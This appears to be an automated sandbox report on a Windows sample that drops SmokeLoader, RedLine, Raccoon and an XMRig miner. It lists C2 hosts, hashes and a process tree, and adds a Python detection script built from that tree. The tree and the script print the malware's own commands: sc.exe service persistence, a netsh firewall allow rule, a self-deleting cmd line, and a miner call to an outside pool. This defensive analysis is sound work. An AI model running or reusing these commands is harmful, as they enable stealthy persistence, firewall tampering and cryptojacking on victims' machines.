Analysis

  • max time kernel
    79s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-09-2021 23:36

General

  • Target

    28351e9cfaca470a9f99b2455b3f1354.exe

  • Size

    134KB

  • MD5

    28351e9cfaca470a9f99b2455b3f1354

  • SHA1

    3546e2d0d5732538a0bb565d410f5ca1de9c3416

  • SHA256

    11b4633345982ace9d710465450941598b2f9289f0438c358fa79eb8eaf680c3

  • SHA512

    2314aa8caf12dd0a730106b3fd6663bf80f8cc798956aef55eeb238d640b11f7a4afafb8f87293df7b6ece96afd4dc9002dfeacb6ecdca5a2296ada2826f4897

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

Attributes
  • rc4.i32

Extracted

Family

redline

Botnet

Denis

C2

45.147.197.123:31820

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

  • rc4.plain

Extracted

Family

redline

Botnet

Bliss

C2

185.237.98.178:62607

Extracted

Family

redline

Botnet

karma

C2

94.103.9.133:39323

Signatures

  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Chinese Botnet Payload 1 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox flags this as a ransomware heuristic, but the families extracted from this sample are stealers and a loader; drive enumeration here is consistent with infostealer file discovery, and no encryption activity is recorded in this run.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe
    "C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe
      "C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:888
  • C:\Users\Admin\AppData\Local\Temp\E3D3.exe
    C:\Users\Admin\AppData\Local\Temp\E3D3.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe
      "C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe"
      2⤵
      • Executes dropped EXE
      PID:3236
    • C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe
      "C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe"
      2⤵
      • Executes dropped EXE
      PID:2336
    • C:\Users\Admin\AppData\Local\Temp\fbf.exe
      "C:\Users\Admin\AppData\Local\Temp\fbf.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Enumerates connected drives
      • Checks processor information in registry
      • Suspicious use of SetWindowsHookEx
      PID:3756
  • C:\Users\Admin\AppData\Local\Temp\E8F4.exe
    C:\Users\Admin\AppData\Local\Temp\E8F4.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\waxngztk\
      2⤵
      PID:3772
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\auqwhrjp.exe" C:\Windows\SysWOW64\waxngztk\
      2⤵
      PID:2696
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create waxngztk binPath= "C:\Windows\SysWOW64\waxngztk\auqwhrjp.exe /d\"C:\Users\Admin\AppData\Local\Temp\E8F4.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:2788
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description waxngztk "wifi internet conection"
      2⤵
      PID:3576
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start waxngztk
      2⤵
      PID:2444
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:3700
  • C:\Users\Admin\AppData\Local\Temp\ED99.exe
    C:\Users\Admin\AppData\Local\Temp\ED99.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3784
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED99.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Windows\SysWOW64\timeout.exe
        timeout /T 10 /NOBREAK
        3⤵
        • Delays execution with timeout.exe
        PID:1452
  • C:\Users\Admin\AppData\Local\Temp\F134.exe
    C:\Users\Admin\AppData\Local\Temp\F134.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3984
  • C:\Users\Admin\AppData\Local\Temp\F6C3.exe
    C:\Users\Admin\AppData\Local\Temp\F6C3.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute facebook.com
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
      2⤵
      PID:4912
  • C:\Windows\SysWOW64\waxngztk\auqwhrjp.exe
    C:\Windows\SysWOW64\waxngztk\auqwhrjp.exe /d"C:\Users\Admin\AppData\Local\Temp\E8F4.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3528
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        3⤵
        PID:4128
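Read top-down, the tree shows the chain a detection engineer would want to alert on: E8F4.exe stages a renamed copy of itself (auqwhrjp.exe) in a freshly created C:\Windows\SysWOW64\waxngztk\ directory, registers it as an auto-start service with the innocuous display name "wifi support", passes its own Temp path as a /d argument, and adds an inbound firewall allow rule for the 32-bit svchost.exe; once the service runs, auqwhrjp.exe spawns svchost.exe, which spawns a second svchost.exe carrying miner arguments (-o pool, -u wallet, -a cn/half). ED99.exe removes itself with a timeout-then-del cmd one-liner, and F6C3.exe probes reachability with Test-NetConnection. The Python below is an added example, not code from this report or from the sandbox that produced it: it re-creates those command lines as constructed process events (the pid/ppid/image/cmdline field names, the two benign services.exe/svchost.exe entries, and services.exe as the parent of the service process are assumptions) and runs heuristic rules over them, so each rule can be checked against the behaviour it is meant to catch and against the benign entries it must leave alone.

```python
"""Heuristic detections over the process tree in this report.

Added example (not from the report or any sandbox tooling).  Events are
constructed from the command lines shown above; the field names pid/ppid/
image/cmdline, the two benign services.exe/svchost.exe entries and
services.exe as parent of the installed service are assumptions.
"""
import re
from collections import Counter
from dataclasses import dataclass

TEMP = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"
SYS32 = "C:\\Windows\\System32\\"
WOW64 = "C:\\Windows\\SysWOW64\\"


def _ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [  # constructed; PIDs follow the report wherever it lists one
    _ev(1000, 4, SYS32 + "services.exe", SYS32 + "services.exe"),                   # benign, constructed
    _ev(1001, 1000, SYS32 + "svchost.exe", SYS32 + "svchost.exe -k netsvcs -p"),    # benign, constructed
    _ev(2716, 664, TEMP + "E8F4.exe", TEMP + "E8F4.exe"),
    _ev(3772, 2716, WOW64 + "cmd.exe", '"' + SYS32 + 'cmd.exe" /C mkdir ' + WOW64 + 'waxngztk\\'),
    _ev(2696, 2716, WOW64 + "cmd.exe", '"' + SYS32 + 'cmd.exe" /C move /Y "' + TEMP + 'auqwhrjp.exe" ' + WOW64 + 'waxngztk\\'),
    _ev(2788, 2716, WOW64 + "sc.exe", '"' + SYS32 + 'sc.exe" create waxngztk binPath= "' + WOW64
        + 'waxngztk\\auqwhrjp.exe /d\\"' + TEMP + 'E8F4.exe\\"" type= own start= auto DisplayName= "wifi support"'),
    _ev(3576, 2716, WOW64 + "sc.exe", '"' + SYS32 + 'sc.exe" description waxngztk "wifi internet conection"'),
    _ev(2444, 2716, WOW64 + "sc.exe", '"' + SYS32 + 'sc.exe" start waxngztk'),
    _ev(3700, 2716, WOW64 + "netsh.exe", '"' + SYS32 + 'netsh.exe" advfirewall firewall add rule '
        'name="Host-process for services of Windows" dir=in action=allow program="' + WOW64 + 'svchost.exe" enable=yes>nul'),
    _ev(3784, 664, TEMP + "ED99.exe", TEMP + "ED99.exe"),
    _ev(2448, 3784, WOW64 + "cmd.exe", 'cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "' + TEMP + 'ED99.exe"'),
    _ev(1452, 2448, WOW64 + "timeout.exe", "timeout /T 10 /NOBREAK"),
    _ev(3008, 664, TEMP + "F6C3.exe", TEMP + "F6C3.exe"),
    _ev(3904, 3008, SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
        '"' + SYS32 + 'WindowsPowerShell\\v1.0\\powershell.exe" Test-NetConnection -TraceRoute facebook.com'),
    _ev(3884, 1000, WOW64 + "waxngztk\\auqwhrjp.exe", WOW64 + 'waxngztk\\auqwhrjp.exe /d"' + TEMP + 'E8F4.exe"'),
    _ev(3528, 3884, WOW64 + "svchost.exe", "svchost.exe"),
    _ev(4128, 3528, WOW64 + "svchost.exe", "svchost.exe -o fastpool.xyz:10060 -u "
        "9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half"),
]


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


_BINPATH = re.compile(r'binPath=\s*"((?:\\.|[^"\\])*)"', re.I)          # honours the \" escapes sc.exe gets
_SYS_SUBDIR_EXE = re.compile(r"^c:\\windows\\(?:syswow64|system32)\\[^\\\s]+\\[^\\\s]+\.exe$", re.I)
_DEL_TARGET = re.compile(r'\bdel\b(?:\s+/\S+)*\s+"?([^"&]+?\.exe)"?', re.I)
_MINER_OPT = re.compile(r"(?:^|\s)-([oua])\s+(\S+)")                     # xmrig-style -o pool -u wallet -a algo


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def miner_options(cmdline):
    """Return {'o': pool, 'u': wallet, 'a': algo} for whichever of the three are present."""
    return dict(_MINER_OPT.findall(cmdline))


def detect(events):
    by_pid = {e["pid"]: e for e in events}
    found = []
    for e in events:
        pid, img, cmd = e["pid"], _base(e["image"]), e["cmdline"]
        low = cmd.lower()
        parent = by_pid.get(e["ppid"])
        pimg = _base(parent["image"]) if parent else ""
        ppath = parent["image"].lower() if parent else ""
        # Payload staged into a SysWOW64 subdirectory with cmd mkdir/move
        if img == "cmd.exe" and re.search(r"\b(mkdir|md|move)\b.*\\syswow64\\", low):
            found.append(Finding(pid, "system_dir_staging", cmd))
        # sc create whose binPath is an .exe in a SysWOW64/System32 *subdirectory*, set to auto-start
        if img == "sc.exe" and " create " in low:
            m = _BINPATH.search(cmd)
            exe = m.group(1).split(" ", 1)[0] if m else ""
            if _SYS_SUBDIR_EXE.match(exe) and "start= auto" in low:
                found.append(Finding(pid, "service_from_system_subdir", exe))
        # Inbound firewall allow for svchost.exe added from user land
        if img == "netsh.exe" and "advfirewall firewall add rule" in low and "action=allow" in low and "svchost.exe" in low:
            found.append(Finding(pid, "firewall_allow_svchost", cmd))
        # Delayed self-deletion: cmd /C timeout ... & del <Temp exe>
        if img == "cmd.exe" and "timeout" in low:
            m = _DEL_TARGET.search(cmd)
            if m and "\\temp\\" in m.group(1).lower():
                found.append(Finding(pid, "self_delete", m.group(1)))
        # svchost.exe not started by services.exe (hollowed or spoofed host process)
        if img == "svchost.exe" and pimg != "services.exe":
            found.append(Finding(pid, "svchost_parent_anomaly", "parent=" + (pimg or "?")))
        # Miner-style arguments regardless of what the image is called
        opts = miner_options(cmd)
        if "o" in opts and "u" in opts:
            found.append(Finding(pid, "miner_cmdline", "pool=%s algo=%s" % (opts["o"], opts.get("a", "?"))))
        # Reachability probe launched by something running out of Temp
        if img == "powershell.exe" and "test-netconnection" in low and "\\temp\\" in ppath:
            found.append(Finding(pid, "connectivity_probe", cmd))
    return found


def summarize(findings):
    return Counter(f.rule for f in findings)


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.pid, f.rule, f.detail)
```

The rules key on process genealogy and command-line shape rather than on the service and directory names, which are random per sample. On these events the svchost_parent_anomaly rule fires twice, because neither svchost.exe instance descends from services.exe, and the miner rule fires on the grandchild even though its image name is svchost.exe; the benign services.exe and svchost.exe -k netsvcs entries produce nothing.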

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/664-114-0x00000000001D0000-0x00000000001D9000-memory.dmp  Filesize 36KB
  • memory/888-115-0x0000000000400000-0x0000000000409000-memory.dmp  Filesize 36KB
  • memory/2336-400-0x0000000004C12000-0x0000000004C13000-memory.dmp  Filesize 4KB
  • memory/2336-410-0x0000000004C10000-0x0000000004C11000-memory.dmp  Filesize 4KB
  • memory/2336-396-0x0000000002430000-0x0000000002453000-memory.dmp  Filesize 140KB
  • memory/2336-398-0x00000000020F0000-0x0000000002127000-memory.dmp  Filesize 220KB
  • memory/2336-405-0x00000000024A0000-0x00000000024C2000-memory.dmp  Filesize 136KB
  • memory/2336-423-0x0000000004C13000-0x0000000004C14000-memory.dmp  Filesize 4KB
  • memory/2336-420-0x0000000004C14000-0x0000000004C16000-memory.dmp  Filesize 8KB
  • memory/2336-407-0x0000000000400000-0x00000000004CB000-memory.dmp  Filesize 812KB
  • memory/2368-121-0x0000000000850000-0x0000000000851000-memory.dmp  Filesize 4KB
  • memory/2716-132-0x00000000004B0000-0x000000000055E000-memory.dmp  Filesize 696KB
  • memory/2716-137-0x0000000000400000-0x00000000004AD000-memory.dmp  Filesize 692KB
  • memory/3008-155-0x000000001BF90000-0x000000001BF92000-memory.dmp  Filesize 8KB
  • memory/3008-139-0x0000000000170000-0x0000000000171000-memory.dmp  Filesize 4KB
  • memory/3024-117-0x00000000005D0000-0x00000000005E6000-memory.dmp  Filesize 88KB
  • memory/3236-406-0x00000000005B0000-0x00000000005E0000-memory.dmp  Filesize 192KB
  • memory/3236-397-0x00000000022E0000-0x00000000022FF000-memory.dmp  Filesize 124KB
  • memory/3236-399-0x0000000004A72000-0x0000000004A73000-memory.dmp  Filesize 4KB
  • memory/3236-424-0x0000000004A74000-0x0000000004A76000-memory.dmp  Filesize 8KB
  • memory/3236-404-0x0000000004A00000-0x0000000004A1E000-memory.dmp  Filesize 120KB
  • memory/3236-413-0x0000000004A70000-0x0000000004A71000-memory.dmp  Filesize 4KB
  • memory/3236-417-0x0000000004A73000-0x0000000004A74000-memory.dmp  Filesize 4KB
  • memory/3236-408-0x0000000000400000-0x00000000004C5000-memory.dmp  Filesize 788KB
  • memory/3528-274-0x0000000002400000-0x0000000002415000-memory.dmp  Filesize 84KB
  • memory/3756-415-0x0000000002030000-0x00000000020EC000-memory.dmp  Filesize 752KB
  • memory/3756-436-0x0000000010000000-0x0000000010018000-memory.dmp  Filesize 96KB
  • memory/3756-403-0x0000000000400000-0x00000000004C4000-memory.dmp  Filesize 784KB
  • memory/3784-159-0x0000000000400000-0x00000000004F0000-memory.dmp  Filesize 960KB
  • memory/3784-156-0x00000000021C0000-0x0000000002250000-memory.dmp  Filesize 576KB
  • memory/3884-275-0x0000000000400000-0x00000000004AD000-memory.dmp  Filesize 692KB
  • memory/3884-273-0x00000000004B0000-0x00000000005FA000-memory.dmp  Filesize 1.3MB
  • memory/3904-593-0x000001BFEC1A0000-0x000001BFEC1A1000-memory.dmp  Filesize 4KB
  • memory/3904-168-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp  Filesize 1.3MB
  • memory/3904-157-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp  Filesize 1.3MB
  • memory/3904-726-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp  Filesize 1.3MB
  • memory/3904-153-0x000001BFEC1D0000-0x000001BFEC1D1000-memory.dmp  Filesize 4KB
  • memory/3904-637-0x000001BFEC180000-0x000001BFEC181000-memory.dmp  Filesize 4KB
  • memory/3904-613-0x000001BFEC1A0000-0x000001BFEC1A1000-memory.dmp  Filesize 4KB
  • memory/3904-158-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp  Filesize 1.3MB
  • memory/3904-149-0x000001BFEC020000-0x000001BFEC021000-memory.dmp  Filesize 4KB
  • memory/3904-369-0x000001BFEC160000-0x000001BFEC161000-memory.dmp  Filesize 4KB
  • memory/3984-384-0x0000000006FF0000-0x0000000006FF1000-memory.dmp  Filesize 4KB
  • memory/3984-373-0x00000000078B0000-0x00000000078B1000-memory.dmp  Filesize 4KB
  • memory/3984-182-0x00000000054C0000-0x00000000054C1000-memory.dmp  Filesize 4KB
  • memory/3984-163-0x0000000005480000-0x0000000005481000-memory.dmp  Filesize 4KB
  • memory/3984-152-0x0000000005550000-0x0000000005551000-memory.dmp  Filesize 4KB
  • memory/3984-379-0x0000000006ED0000-0x0000000006ED1000-memory.dmp  Filesize 4KB
  • memory/3984-148-0x0000000005420000-0x0000000005421000-memory.dmp  Filesize 4KB
  • memory/3984-356-0x0000000006C80000-0x0000000006C81000-memory.dmp  Filesize 4KB
  • memory/3984-362-0x0000000007380000-0x0000000007381000-memory.dmp  Filesize 4KB
  • memory/3984-141-0x0000000005A30000-0x0000000005A31000-memory.dmp  Filesize 4KB
  • memory/3984-167-0x0000000005420000-0x0000000005A26000-memory.dmp  Filesize 6.0MB
  • memory/3984-133-0x0000000000C10000-0x0000000000C11000-memory.dmp  Filesize 4KB
  • memory/3984-394-0x0000000007DB0000-0x0000000007DB1000-memory.dmp  Filesize 4KB
  • memory/3984-391-0x0000000006FB0000-0x0000000006FB1000-memory.dmp  Filesize 4KB
  • memory/4128-687-0x0000000002490000-0x0000000002581000-memory.dmp  Filesize 964KB
  • memory/4128-679-0x0000000002490000-0x0000000002581000-memory.dmp  Filesize 964KB
  • memory/4912-777-0x00000218DA2E0000-0x00000218DA2E2000-memory.dmp  Filesize 8KB
  • memory/4912-778-0x00000218DA2E6000-0x00000218DA2E8000-memory.dmp  Filesize 8KB
  • memory/4912-779-0x00000218DA2E3000-0x00000218DA2E5000-memory.dmp  Filesize 8KB